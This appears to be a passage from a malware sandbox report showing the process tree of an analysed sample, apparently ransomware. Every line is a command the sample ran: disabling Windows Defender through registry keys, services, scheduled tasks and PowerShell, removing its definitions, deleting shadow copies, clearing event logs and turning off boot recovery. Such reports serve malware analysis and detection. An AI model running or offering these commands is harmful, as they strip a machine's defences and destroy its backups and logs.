C:\Windows\SYSTEM32\sc.exesc.exe config "vmicvss" start= disabled2⤵PID:1068
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "VSS" start= disabled2⤵PID:1228
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "wbengine" start= disabled2⤵PID:1448
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "WebClient" start= disabled2⤵PID:1632
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "UnistoreSvc_12c39" start= disabled2⤵PID:1896
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1808
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:2340
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:2576
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:3256
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:3088
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:3232
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:4828
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:1196
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1372
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:2968
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:4900
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:4592
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:4752
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:3016
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:2888
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:5064
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:5008
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:700
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:1176
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:4904
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:2008
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:2208
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:4508
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:1332
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:1572
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:1712
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:2104
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:4808
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2304
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2988
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3628
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:4688
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3756
-
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:3772
-
-
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2176
-
-
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4036
-
-
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4100
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4136
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3184
-
-
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:4284
-
-
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:4244
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:4344
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:4324
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:4320
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3040
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:1608
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1780
-
-